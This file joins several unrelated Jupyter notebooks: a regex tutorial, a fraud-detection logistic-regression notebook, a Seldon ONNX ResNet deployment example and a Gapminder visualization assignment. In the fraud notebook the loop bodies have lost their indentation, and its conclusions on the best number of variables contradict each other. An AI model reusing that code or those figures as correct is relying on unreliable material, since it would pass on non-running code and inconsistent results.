# *But tokenization is much more than just separating words*<br>
#
# * For processing tweets or texts we’ll need to tokenize emoticons like :) or hashtags like #nlproc.
# ---
# * <strong>Lemmatization</strong>
# * The task of determining that two words have the same root, despite their surface differences. For example, sang, sung, sing have the same root <strong>sing</strong>.
# ℹ️ The word *sing* is known as a <strong>lemma</strong>
# ---
# * <strong>Stemming</strong>
# * Stemming refers to a simpler version of lemmatization in which we mainly just strip suffixes from the end of the word.
# ---
# * <strong>Sentence segmentation</strong>
# * Sentence segmentation is the method of breaking text up into individual sentences using cues like the period (.), exclamation mark (!), and more.
# ---
#
# ### Edit Distance
# > Edit distance is a metric that measures the similarity between two strings based on the number of edits (insertions, deletions, substitutions) needed to turn one into the other.
#
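# A minimal dynamic-programming sketch of edit distance (unit costs for all three edit types; some formulations charge 2 for substitution) makes the definition concrete:

```python
def edit_distance(s, t):
    # Levenshtein distance: minimum number of insertions, deletions,
    # and substitutions needed to turn s into t (unit cost each).
    prev = list(range(len(t) + 1))
    for i, cs in enumerate(s, 1):
        cur = [i]
        for j, ct in enumerate(t, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (cs != ct)))   # substitution
        prev = cur
    return prev[-1]

print(edit_distance("intention", "execution"))  # 5
```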
# ---
#
#
# <span style="color:red">English words are often separated by whitespace, but that is not always the case. For example, 'New York' and 'rock 'n' roll' should be treated as single large words rather than being split into *New* and *York*. A good reason not to rely on Python's split() method for tokenization.</span>
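# A quick standalone illustration of that caveat:

```python
text = "I moved to New York to play rock 'n' roll"
tokens = text.split()
print(tokens)
# 'New' and 'York' come out as separate tokens; a tokenizer aware of
# multi-word expressions would keep 'New York' together.
```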
# ---
# <h2 style="text-align:center">Regular Expressions</h2>
# * Regular expressions are useful when we have a *pattern* to search within a *corpus* of text.
# <br>
# ---
# <strong>Corpus</strong> - A collection of documents or a single document.
#
# ---
# <br>
#
# * A regular expression search function will search through the corpus, returning all texts that match the pattern.
# * Here, regular expressions are delimited by forward slashes (/).
# ---
# A simple regular expression would be a sequence of characters.
# For example, /woodchuck/, /buttercup/
#
# > Couple of things to pay attention to.
#
# * Regular expressions are case-sensitive. 'Woodchuck' does not match the regex /woodchuck/
# * Note how the regex is delimited by /.
#
# #### Square brackets [ ]
#
# > The string of characters inside square braces denote <strong>disjunction</strong> of characters to match. In other words, specifies an OR condition.
#
# For example,
#
# /[wW]oodchuck/ - This regex matches <strong>w</strong>oodchuck or <strong>W</strong>oodchuck.<br>
#
# /[abc]/ - Matches sequence having <strong>a</strong>, <strong>b</strong>, or <strong>c</strong>. Matches 'Hi my n<strong>a</strong>me is John', but not 'A good night'
# #### Dash -
#
# > Characters seperated by dash denote a range.
#
# For example,
#
# /[2-5]/ - A range of 2 to 5. 2, 3, 4, or 5.<br>
#
# /[a-z]/ - A range of lowercase English alphabets. a,b,c,...,z. Matches '<strong>a</strong> good day.'<br>
#
# /[A-Z]/ - A range of uppercase English alphabets. A,B,C,...,Z. Matches '<strong>B</strong>est day of my life.'<br>
# #### Caret ^
#
# > If caret is the first character inside a square bracket, the sequence after it is negated. In other words, all the characters are matched except the ones after caret.
#
# For example,
#
# /[^A-Z]/ - Matches lowercase letters but not uppercase. Matches 'I WAS GOING TO <strong>t</strong>he market'.<br>
#
# /[^Ss]/ - Neither S nor s. Matches '<strong>I</strong> had a bad day.'<br>'S<strong>o</strong>metimes I wish to escape'.<br>
#
# /[A-Z]/ - A range of uppercase English alphabets. A,B,C,...,Z. Matches '<strong>B</strong>est day of my life.'<br>
# #### Question mark ?
#
# > If specified after a character, ? matches that character zero or one time. In other words, the character before ? is optional.
#
# For example,
#
# /woodchucks?/ - Matches strings having 'woodchuck' with or without a trailing 's'. Matches woodchuck or woodchucks<br>
#
# /colou?r/ - Matches strings where the 'u' in colour is optional. Matches color or colour.<br>
#
print(re.findall(r'[Ss]ome','sometimes I feel very energetic. Somedays not.'))
log.info(' Matches Some and some')
log.info("The findall() method returns all the words that match a pattern in a corpus. search() returns the first point of match")
print(re.findall(r'h[abc][vd]','I have had a good day in the cabin ha of my backyard.'))
log.info(' Matches words starting with h, having a,b, or c and ending with v or d')
print(re.findall(r'[A-Z]','This is the Besttttt day of my Liffeee'))
log.info(' Matches uppercase letters.')
print(re.findall(r'[^A-Z]','This is the Besttttt day of my Liffeee'))
log.info(' Matches everything except uppercase letters.')
print(re.findall(r'[^T]','This is the Besttttt day of my Liffeee'))
log.info(' Matches everything except uppercase T.')
print(re.findall(r'colou?r','Bright colors and colours'))
log.info(' Matches if string has color or colour')
print(re.findall(r'[A-Za-z]unny days?','sunny day vs sunny days vs Sunny day vs Sunny days vs funny day'))
log.info(' Matches if string has anything with unny day or unny days')
# #### Kleene *
#
# > The Kleene star means “zero or more occurrences of the immediately previous character or regular expression”.
#
# For example,
#
# /a*/ - Matches zero or more 'a'. Matches 'baaaaaaa' and 'Hello'<br>
#
# /aa*/ - Matches one or more 'a'. Matches 'baaaaaa' but not 'Hello' because at least one 'a' must be present<br>
#
print(re.findall(r'a*','Hello'))
log.info(' Zero \'a\' found')
print(re.findall(r'aa*','Hello'))
log.info(' No \'a\' found')
print(re.findall(r'[ab]*','Baaaaaa & aaaaaaa and a'))
log.info('Matches if string has zero or more \'a\' or \'b\' ')
print(re.findall(r'[ab]*','bbbbbb'))
log.info(' Matches if string has zero or more \'a\' or \'b\' ')
# #### Kleene +
#
# > The Kleene + means “one or more occurrences of the immediately previous character or regular expression”.
#
# For example,
#
# /a+/ - Matches one or more 'a'. Matches 'baaaaaaa' but not 'Hello'<br>
#
# /[0-9]+/ - Matches sequence of digits<br>
#
print(re.findall(r'[0-9]+','My phone number is 9457068769'))
log.info(' Matches sequence of digits')
# #### Period .
#
# > The period specifies any single character (wildcard).
#
# For example,
#
# /beg.n/ - Matches any single character between 'beg' and 'n'<br>
#
print(re.findall(r'beg.n','begin vs begun vs beg\'n'))
log.info(' Matches anything with "beg" and "n"')
print(re.findall(r't.*d','tday vs timid vs ticked vs topped vs top'))
log.info(' Matches sequence starting with "t" and ending with "d"')
print(re.findall(r'beg.n','It is the beginning'))
log.info(' Matches anything with "beg" and "n"')
# #### Anchors
#
# > Anchors are special characters that anchor regular expressions to particular places in a string.
#
# * ^ (caret) specifies the start of line.
#
# * $ (dollar) matches end of line.
#
# * \b matches a word boundary.
#
# * \B matches a non-word boundary
print(re.findall(r'^The','The is a very common word in English'))
log.info(' Matches if "The" is at the beginning of string')
print(re.findall(r'^the','The is the most common word in English'))
log.info(' Matches if "the" is at the beginning of string. Note that "the" is present but not matched.')
print(re.findall(r'the$','Pattern you are looking for is -> the'))
log.info(' Matches if "the" is at the end of string.')
print(re.findall(r'the$','You are the winner'))
log.info(' Matches if "the" is at the end of string. Notice that "the" is present but not matched')
print(re.findall(r'\bthe\b','the vs other'))
log.info(' Matches words having only "the". Notice that "the" is present in "other" but not matched')
print(re.findall(r'\bthe\b','the vs other'))
# <h2 style="text-align:center">Disjunction, Grouping, & Precedence</h2>
# #### Disjunction operator |
#
# > Disjunction operator is used to search for more than one string. Example, you want to search for "cats" or "dogs". You cannot use /[catsdogs]/, instead use /cats|dogs/
#
# For example,
#
# /cats|dogs/ - This regex matches <strong>cats</strong> or <strong>dogs</strong>.<br>
re.findall(r'cats|dogs','I have two cats and 3 dogs')
re.search(r'cats|dogs','I have two cats and 3 dogs')
print(re.findall(r'[0-9]+|[A-Z]','this will return empty list'))
log.info(" It returns empty list because there are no string of digits or(|) uppercase letters")
print(re.findall(r'[0-9]+|[A-Z]','this will return something because it has num3er5'))
log.info(" It returns where it finds a sequence of one or more digits")
print(re.findall(r'[0-9]+|[A-Z]','this will return something because it has num3er5 as well as UPPERCASE LETTERS'))
log.info(" It returns where it finds a sequence of one or more digits or uppercase letters")
print(re.findall(r'[0-9]+|[A-Z]+','this will return something because it has num3er5 as well as UPPERCASE LETTERS'))
log.info(" Notice the differece in output due to Kleene+")
# #### Precedence ( )
#
# > Enclosing a pattern inside ( ) groups it so that it acts as a single unit.
#
# For example, <br>
# If you want to match 'guppy' or 'guppies', you can use /gupp(y|ies)/ instead of /guppy|guppies/.
print(re.search(r'gupp(y|ies)','I have a lot of guppies and she has one guppy'))
log.info(" Using search() here to demonstrate. search() returns when the first match is found.")
# ---
#
# <h1 style="text-align:center"> Operator precedence hierarchy</h1>
from prettytable import PrettyTable
table = PrettyTable()
table.field_names = ('Operator Name','Operator')
table.add_row(["Parentheses", '()'])
table.add_row(["Counters", '* + ? {}'])
table.add_row(["Disjunction", '|'])
print(table)
# * It's easy to miss some strings while using regular expressions, because one pattern's matches may miss strings that a slightly different pattern would catch.
# ---
#
# > There are two kinds of errors:
#
# * false positives: strings that we incorrectly matched.
# * false negatives: strings that we incorrectly missed.
# Reducing the overall error rate for an application thus involves two antagonistic efforts:
# <br>
#
# • Increasing <strong>precision</strong> (minimizing false positives) <br>
# • Increasing <strong>recall</strong> (minimizing false negatives)
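# With hypothetical counts from one pattern-matching run, the two metrics are computed as:

```python
# Hypothetical counts from one pattern-matching run
tp = 90   # true positives: strings correctly matched
fp = 10   # false positives: strings incorrectly matched
fn = 30   # false negatives: strings incorrectly missed

precision = tp / (tp + fp)
recall = tp / (tp + fn)
print(precision, recall)  # 0.9 0.75
```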
# #### Substitution operator s/
#
# > Substitution operator is used to substitute a regex with a given pattern.
#
#
# For example, <br>
# If you want to substitute 'guppy' with 'guppies', you can use s/guppy/guppies/.
#
# *Python code below*
re.sub(pattern=r'guppy',string='I have 4 guppy',repl='guppies')
# ---
#
# ##### Capture group
#
# > This use of parentheses to store a pattern in memory is called a capture group. Every time a capture group is used (i.e., parentheses surround a pattern), the resulting match is stored in a numbered register. If you match two different sets of parentheses, \2 means whatever matched the second capture group.
#
# For example,
#
# /the (.*)er they (.*), the \1er we \2/
#
# The above regex will match 'the faster they ran, the faster we ran' but not 'the faster they ran, the faster we ate'.
# 
# * The first (.*)er matches anything that ends with er, and the text matched by (.*) is stored in register \1.
# * \1 and \2 later in the pattern must then match exactly the text stored in the first and second capture groups.
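# Running the capture-group example confirms this behaviour:

```python
import re

pattern = r'the (.*)er they (.*), the \1er we \2'
print(re.findall(pattern, 'the faster they ran, the faster we ran'))  # [('fast', 'ran')]
print(re.findall(pattern, 'the faster they ran, the faster we ate'))  # []
```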
# A related construct is the negative lookahead (?!...): the match below fails because the string starts with 'Volcano'.
re.findall(r'^(?!Volcano)[A-Za-z]+','Volcano has erupted')
# ---
#
# Want to learn regex in depth? Click [here](https://github.com/ziishaned/learn-regex)
| Unit 1 - Introduction/.ipynb_checkpoints/Chapter 1 | Regular Expressions-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:py3k]
# language: python
# name: conda-env-py3k-py
# ---
# + [markdown] nbpresent={"id": "a7289771-729f-48bb-9be7-bd99538fb72a"}
# # Project 3 Fraud Detection Algorithm
# + [markdown] nbpresent={"id": "44d4eb36-ee0e-4070-b455-472afb0f3f4a"}
# ## Load data and data split
# + nbpresent={"id": "3be92b91-7733-4e0b-b0e7-5f48915edeb6"}
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
import random
import warnings
warnings.filterwarnings("ignore")
data = pd.read_csv("vars_final_zscale-2.csv", index_col = 0)
# -
data.shape
# + nbpresent={"id": "affacd4e-c4f5-4205-8c3b-ddf001223236"}
data.head()
# + nbpresent={"id": "d26d6714-cef7-4d41-a351-91c541107406"}
# test for NaN values
pd.isnull(data).any()
# -
# split data into out-of-time (after 11/1/10) and train/test portions
# note: iloc's end index is exclusive, so :833508 keeps record 833507 in the train/test set
oot_df = data.iloc[833508:,:]
trte_df = data.iloc[:833508,:]
train, test = train_test_split(trte_df, test_size=0.2, random_state=0)
oot_df.to_csv('oot.csv',index=True)
train.to_csv('train.csv',index=True)
test.to_csv('test.csv',index=True)
# + nbpresent={"id": "082165ed-e1a2-484a-9477-f19bc7fcc478"}
train.head()
# -
train.describe()
sum(train['fraud_label'])/len(train['fraud_label'])
test.head()
test.describe()
sum(test['fraud_label'])/len(test['fraud_label'])
# + [markdown] nbpresent={"id": "6dd1e682-6841-4836-a4cd-9786c98d6d8d"}
# ## Build algorithm
# + nbpresent={"id": "8ff86ed0-ffa6-4cf9-8314-f3b419fa06ce"}
# split labels and features
train_lab = train["fraud_label"]
train_fea = train.iloc[:,1:]
train_fea.head()
# +
test_lab = test["fraud_label"]
test_fea = test.iloc[:,1:]
test_fea.head()
# +
oot_lab = oot_df["fraud_label"]
oot_fea = oot_df.iloc[:,1:]
oot_fea.head()
# -
# import necessary packages
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score
from sklearn.metrics import confusion_matrix
# + [markdown] nbpresent={"id": "183c6087-bab7-495b-991e-5f26dbc87272"}
# ### Trial on Logistic Regression With All the Features
# + nbpresent={"id": "6a5dc069-a3a0-47f0-8c1e-8ab2fcaa2fb8"}
clf = LogisticRegression()
# train the classifier and fit the model
clf.fit(train_fea, train_lab)
# model evaluation: the mean accuracy on the given test data and labels
accuracy = clf.score(train_fea, train_lab)
print("accuracy:", accuracy)
# -
# # Feature Selection based on Accuracy
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
score = clf.score(features_sub, train_lab)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('Accuracy on training data')
plt.ylabel('Accuracy')
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
features_sub_test = test_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
score = clf.score(features_sub_test, test_lab)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('Accuracy on testing data')
plt.ylabel('Accuracy')
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
features_sub_oot = oot_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
score = clf.score(features_sub_oot, oot_lab)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('Accuracy on oot data')
plt.ylabel('Accuracy')
# # Feature Selection based on ROC_AUC
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
predictions = clf.predict(features_sub)
score = roc_auc_score(train_lab, predictions)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('ROC_AUC_Score on training data')
plt.ylabel('ROC_AUC_Score')
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
features_sub_test = test_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
predictions = clf.predict(features_sub_test)
score = roc_auc_score(test_lab, predictions)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('ROC_AUC_Score on testing data')
plt.ylabel('ROC_AUC_Score')
# +
accuracy = []
for i in range(1,train_fea.shape[1]):
features_sub = train_fea.iloc[:,:i]
features_sub_oot = oot_fea.iloc[:,:i]
clf = LogisticRegression()
clf.fit(features_sub, train_lab)
predictions = clf.predict(features_sub_oot)
score = roc_auc_score(oot_lab, predictions)
accuracy.append(score)
print(i, score)
print("")
print(len(accuracy))
print(max(accuracy))
# -
plt.plot(accuracy)
plt.title('ROC_AUC_Score on oot data')
plt.ylabel('ROC_AUC_Score')
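# One caveat on the ROC_AUC loops above: they score hard 0/1 outputs from `predict`, while ROC-AUC is normally computed from `predict_proba` so the full ranking of records is used. A small self-contained sketch (the synthetic data is an assumption):

```python
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score

rng = np.random.RandomState(0)
X = rng.normal(size=(200, 3))
y = (X[:, 0] + 0.5 * rng.normal(size=200) > 0).astype(int)

clf = LogisticRegression().fit(X, y)
auc_hard = roc_auc_score(y, clf.predict(X))              # thresholded 0/1 labels
auc_prob = roc_auc_score(y, clf.predict_proba(X)[:, 1])  # full probability ranking
print(auc_hard, auc_prob)
```

# Using probabilities is especially relevant for fraud detection, where the ranking of the riskiest records matters more than the 0.5 cutoff.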
# # Feature Selection based on FDR
def multipltrun(a=10,v=17):
'''
This function runs the model on different samples based on user input:
"a" (int): how many random samples, default 10
"v" (int): how many variables, default 17 (most important ones from backward selection)
Users can modify the model to use a different machine learning algorithm and parameters.
FDR is calculated by sorting the outcomes in descending order, cutting off at 3%,
then summing the number of fraud records in the top 3% and dividing by the total
fraud records for that sample.
The final output is a dataframe containing FDR at 3% for the training, testing, and oot sets.
'''
#declare dict
FDRdict={"train":[],"test":[],"oot":[]}
for i in range(a):
#split training and testing
train, test = train_test_split(trte_df, test_size=0.2,random_state=i)
# split labels and features
train_lab = train["fraud_label"]
train_fea = train.iloc[:,1:v+1]
test_lab = test["fraud_label"]
test_fea = test.iloc[:,1:v+1]
oot_lab=oot_df["fraud_label"]
oot_fea=oot_df.iloc[:,1:v+1]
#define and fit model
clf = LogisticRegression()
clf.fit(train_fea, train_lab)
#calculate FDR
for sets in ["train","test","oot"]:
fea=vars()[sets+'_fea']
lab=vars()[sets+'_lab']
prob=pd.DataFrame(clf.predict_proba(fea)) #modify based on your model
result=pd.concat([pd.DataFrame(lab).reset_index(),prob],axis=1)
topRows=int(round(len(result)*0.03))
top3per=result.sort_values(by=1,ascending=False).head(topRows)
FDR=sum(top3per.loc[:,'fraud_label'])/sum(result.loc[:,'fraud_label'])
FDRdict[sets].append(FDR)
#convert into dataframe
FDR_df=pd.DataFrame(FDRdict)
#add new row to calculate mean
FDR_df.loc['mean']=FDR_df.mean()
return FDR_df
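# The FDR-at-3% calculation described in the docstring can be sketched in isolation on toy data (the toy scores and labels below are assumptions, not the project data):

```python
import pandas as pd

def fdr_at_k(labels, scores, k=0.03):
    """Fraction of all fraud records captured in the top-k share by score."""
    df = pd.DataFrame({"fraud_label": labels, "score": scores})
    top_rows = int(round(len(df) * k))
    top = df.sort_values("score", ascending=False).head(top_rows)
    return top["fraud_label"].sum() / df["fraud_label"].sum()

# toy example: 100 records, 5 frauds, 2 of them inside the top 3% by score
scores = list(range(100, 0, -1))
labels = [0] * 100
for i in (0, 1, 50, 60, 70):
    labels[i] = 1
print(fdr_at_k(labels, scores))  # 0.4
```

# The functions below follow the same recipe, with `clf.predict_proba` supplying the scores.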
multipltrun()
multipltrun(v=16)
def multipltrun_2(a=10,v=17):
'''
This function runs the model on different samples and variable counts based on user input:
"a" (int): how many random samples, default 10
"v" (int): the maximum number of variables, default 17
Users can modify the model to use a different machine learning algorithm and parameters.
FDR is calculated by sorting the outcomes in descending order, cutting off at 3%,
then summing the number of fraud records in the top 3% and dividing by the total
fraud records for that sample.
The final output is a dataframe containing the mean FDR at 3% for train, test, and oot
for each number of variables from 1 to v.
'''
#declare dict
FDRdf_v=pd.DataFrame({"train":[],"test":[],"oot":[]})
for j in range(1,v+1):
FDRdict={"train":[],"test":[],"oot":[]}
for i in range(a):
#split training and testing
train, test = train_test_split(trte_df, test_size=0.2,random_state=i)
# split labels and features
train_lab = train["fraud_label"]
train_fea = train.iloc[:,1:j+1]
test_lab = test["fraud_label"]
test_fea = test.iloc[:,1:j+1]
oot_lab=oot_df["fraud_label"]
oot_fea=oot_df.iloc[:,1:j+1]
#define and fit model
clf = LogisticRegression()
clf.fit(train_fea, train_lab)
#calculate FDR
for sets in ["train","test","oot"]:
fea=vars()[sets+'_fea']
lab=vars()[sets+'_lab']
prob=pd.DataFrame(clf.predict_proba(fea))
result=pd.concat([pd.DataFrame(lab).reset_index(),prob],axis=1)
topRows=int(round(len(result)*0.03))
top3per=result.sort_values(by=1,ascending=False).head(topRows)
FDR=sum(top3per.loc[:,'fraud_label'])/sum(result.loc[:,'fraud_label'])
FDRdict[sets].append(FDR)
#convert into dataframe
FDR_df=pd.DataFrame(FDRdict)
#add new row to calculate mean
# FDRdf_v.append(FDR_df.mean(),ignore_index=True)
FDRdf_v.loc[j+1]=FDR_df.mean()
return FDRdf_v
multipltrun_2()
multipltrun_2(v = 16)
multipltrun_df = multipltrun_2()
# ## According to the tables above, the optimal FDR for oot data is 0.375419, corresponding to 13 variables.
multipltrun_df.head()
multipltrun_df = multipltrun_df.reset_index()
plt.plot(multipltrun_df['oot'])
plt.title('FDR on oot data')
plt.ylabel('FDR')
# Conclusion: optimal # of variables is 17, the corresponding FDR is 0.504955.
| Fraud/logistic_regression.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # ONNX ResNet Model
#
# This example will show inference over an exported [ONNX](https://github.com/onnx/onnx) ResNet model using Seldon Core. We will use the Seldon S2I wrapper for Intel's NGraph. The example follows this [NGraph tutorial](https://ai.intel.com/adaptable-deep-learning-solutions-with-ngraph-compiler-and-onnx/).
#
# Prerequisites:
# * ```pip install seldon-core```
# * To test locally [ngraph installed](https://github.com/NervanaSystems/ngraph-onnx)
# * protoc > 3.4.0
#
# To run all of the notebook successfully you will need to start it with
# ```
# jupyter notebook --NotebookApp.iopub_data_rate_limit=100000000
# ```
# Download the ResNet model from the ONNX Model Zoo.
# !wget https://s3.amazonaws.com/download.onnx/models/opset_8/resnet50.tar.gz
# !tar -xzvf resnet50.tar.gz
# !rm resnet50.tar.gz
# %matplotlib inline
from keras.applications.imagenet_utils import decode_predictions
from keras.applications.resnet50 import preprocess_input
from keras.preprocessing import image
import ngraph as ng
import numpy as np
import matplotlib.pyplot as plt
# ## Test Model
# Load ONNX model into ngraph.
# +
from ngraph_onnx.onnx_importer.importer import import_onnx_file
# Import the ONNX file
models = import_onnx_file('resnet50/model.onnx')
# Create an nGraph runtime environment
runtime = ng.runtime(backend_name='CPU')
# Select the first model and compile it to a callable function
model = models[0]
resnet = runtime.computation(model['output'], *model['inputs'])
# -
# Test on an image of a Zebra.
img = image.load_img('zebra.jpg', target_size=(224, 224))
img = image.img_to_array(img)
plt.imshow(img / 255.)
x = np.expand_dims(img.copy(), axis=0)
x = preprocess_input(x,mode='torch')
x = x.transpose(0,3,1,2)
preds = resnet(x)
decode_predictions(preds[0], top=5)
# ## Package Model Using S2I
# !s2i build . seldonio/seldon-core-s2i-python3-ngraph-onnx:0.3 onnx-resnet:0.1
# !docker run --name "onnx_resnet_predictor" -d --rm -p 5000:5000 onnx-resnet:0.1
# !seldon-core-tester contract.json 0.0.0.0 5000 -p
# !docker rm onnx_resnet_predictor --force
# ## Test using Minikube
#
# **Due to a [minikube/s2i issue](https://github.com/SeldonIO/seldon-core/issues/253) you will need [s2i >= 1.1.13](https://github.com/openshift/source-to-image/releases/tag/v1.1.13)**
# !minikube start --memory 4096
# !kubectl create clusterrolebinding kube-system-cluster-admin --clusterrole=cluster-admin --serviceaccount=kube-system:default
# !helm init
# !kubectl rollout status deploy/tiller-deploy -n kube-system
# !helm install ../../../helm-charts/seldon-core-operator --name seldon-core --set usageMetrics.enabled=true --namespace seldon-system
# !kubectl rollout status deploy/seldon-controller-manager -n seldon-system
# ## Setup Ingress
# Please note: There are reported gRPC issues with ambassador (see https://github.com/SeldonIO/seldon-core/issues/473).
# !helm install stable/ambassador --name ambassador --set crds.keep=false
# !kubectl rollout status deployment.apps/ambassador
# !eval $(minikube docker-env) && s2i build . seldonio/seldon-core-s2i-python3-ngraph-onnx:0.3 onnx-resnet:0.1
# !kubectl create -f onnx_resnet_deployment.json
# !kubectl rollout status deploy/onnx-resnet-deployment-onnx-resnet-predictor-21cdd95
# !seldon-core-api-tester contract.json `minikube ip` `kubectl get svc ambassador -o jsonpath='{.spec.ports[0].nodePort}'` \
# seldon-deployment-example --namespace seldon -p
# !minikube delete
| examples/models/onnx_resnet50/onnx_resnet50.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/sanjaykmenon/DS-Unit-1-Sprint-2-Data-Wrangling-and-Storytelling/blob/master/module4-sequence-your-narrative/Sanjay_Krishna__LS_DS_124_Sequence_your_narrative_Assignment.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] colab_type="text" id="JbDHnhet8CWy"
# _Lambda School Data Science_
#
# # Sequence Your Narrative - Assignment
#
# Today we will create a sequence of visualizations inspired by [<NAME>'s 200 Countries, 200 Years, 4 Minutes](https://www.youtube.com/watch?v=jbkSRLYSojo).
#
# Using this [data from Gapminder](https://github.com/open-numbers/ddf--gapminder--systema_globalis/):
# - [Income Per Person (GDP Per Capita, Inflation Adjusted) by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--income_per_person_gdppercapita_ppp_inflation_adjusted--by--geo--time.csv)
# - [Life Expectancy (in Years) by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--life_expectancy_years--by--geo--time.csv)
# - [Population Totals, by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--population_total--by--geo--time.csv)
# - [Entities](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--entities--geo--country.csv)
# - [Concepts](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--concepts.csv)
# + [markdown] colab_type="text" id="zyPYtsY6HtIK"
# Objectives
# - sequence multiple visualizations
# - combine qualitative anecdotes with quantitative aggregates
#
# Links
# - [<NAME>’s TED talks](https://www.ted.com/speakers/hans_rosling)
# - [Spiralling global temperatures from 1850-2016](https://twitter.com/ed_hawkins/status/729753441459945474)
# - "[The Pudding](https://pudding.cool/) explains ideas debated in culture with visual essays."
# - [A Data Point Walks Into a Bar](https://lisacharlotterost.github.io/2016/12/27/datapoint-in-bar/): a thoughtful blog post about emotion and empathy in data storytelling
# + [markdown] colab_type="text" id="_R1bj8aXzyVA"
# # ASSIGNMENT
#
#
# 1. Replicate the Lesson Code
# 2. Take it further by using the same gapminder dataset to create a sequence of visualizations that combined tell a story of your choosing.
#
# Get creative! Use text annotations to call out specific countries. Maybe change how the points are colored, change the opacity of the points, change their size, or pick a specific time window. Maybe only work with a subset of countries, change fonts, change background colors, etc. Make it your own!
# + id="gBE_yQRk3pYZ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="d72372cb-e850-4ff2-edb4-f2be38e6709c"
# TODO
import seaborn as sns
sns.__version__
# + id="e6ST4ZkUYq4S" colab_type="code" colab={}
# %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# + id="BdJyuD2xZfYv" colab_type="code" colab={}
income = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--income_per_person_gdppercapita_ppp_inflation_adjusted--by--geo--time.csv')
# + id="bG31FDxgZrux" colab_type="code" colab={}
lifespan = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--life_expectancy_years--by--geo--time.csv')
# + id="uejVk8CaZuRp" colab_type="code" colab={}
population = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--population_total--by--geo--time.csv')
# + id="-4WtudsMZwUe" colab_type="code" colab={}
entities = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--entities--geo--country.csv')
# + id="7KWNKTnYZyju" colab_type="code" colab={}
concepts = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--concepts.csv')
# + id="vsXGFenXZ4JH" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="701800b8-2aa5-433d-d6b2-d57498b96b36"
income.shape, lifespan.shape, population.shape, entities.shape, concepts.shape
# + id="iqIcn9XaZ9-R" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 206} outputId="185714b4-ce06-4540-e8e8-701e7f1bf5a9"
income.head()
# + id="k18vEoPtaAEB" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 363} outputId="8ea318df-e51c-40b8-835e-647c5d0ce9c9"
income.sample(10)
# + id="RC_TTSgwaEFA" colab_type="code" colab={}
pd.options.display.max_columns=500
# + id="tDzm2Fg3cGC3" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 261} outputId="d98009b2-328d-48f7-bd17-3517ec1531b0"
entities.head()
# + id="oOmJ06ArcHvo" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 556} outputId="5af032c6-9b45-4353-9bf9-99ac02bc2e07"
concepts.head()
# + id="jfEcaQL_cOoK" colab_type="code" colab={}
# + [markdown] id="PKjJTQXI3qGI" colab_type="text"
# # STRETCH OPTIONS
#
# ## 1. Animate!
#
# - [How to Create Animated Graphs in Python](https://towardsdatascience.com/how-to-create-animated-graphs-in-python-bb619cc2dec1)
# - Try using [Plotly](https://plot.ly/python/animations/)!
